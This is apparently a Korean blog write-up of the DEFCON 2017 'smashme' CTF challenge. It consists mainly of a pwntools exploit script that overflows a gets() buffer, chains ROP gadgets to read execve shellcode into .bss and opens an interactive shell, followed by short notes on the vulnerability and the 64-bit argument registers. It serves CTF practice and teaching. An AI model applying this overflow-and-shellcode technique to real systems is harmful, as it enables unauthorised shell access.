ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • DEFCON 2017 smashme
    Pwnable/CTF 2017. 5. 2. 23:16
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    p=remote("192.168.146.133",9001)
    elf=ELF("./smashme")
     
    read_plt=elf.symbols["read"]
    bss=elf.bss()+0x20
     
    shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
     
    shell_rsi=0x004015f7
    shell_rdi=0x004014d6
    shell_rdx=0x00441e46
     
    filt="Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
     
    payload=filt
    payload+=p64(shell_rsi)
    payload+=p64(bss)
    payload+=p64(shell_rdi)
    payload+=p64(0)
    payload+=p64(shell_rdx)
    payload+=p64(len(shellcode))
    payload+=p64(read_plt)
    payload+=p64(bss)
     
     
    p.sendline(payload)
    p.sendline(shellcode)
    p.interactive()
     
     
    cs


    아이다로 보면 GETS함수로 버퍼오버플로우 취약점이 있음


    분기문 하나가 보일텐데 저 문자열(filt 변수 문자열)이 아니라면 QUIT 시키고 맞다면 정상적으로 leave; ret이 됨


    쉘코드가 64bit syscall하는 쉘코드 (출처 : http://shell-storm.org/shellcode/files/shellcode-806.php)


    rdi 1

    rsi 2

    rdx 3 

    rcx  4

    64bit 인자 레지스터

    'Pwnable > CTF' 카테고리의 다른 글

    Secuinside 2017 ohce  (0) 2017.07.03
    Codegate 2016 floppy  (0) 2017.06.10
    BKPCTF cookbook  (0) 2017.03.31
    PlaidCTF 2014 kappa  (0) 2017.03.14
    PlaidCTF 2014 EZHP  (2) 2017.03.10
Designed by Tistory.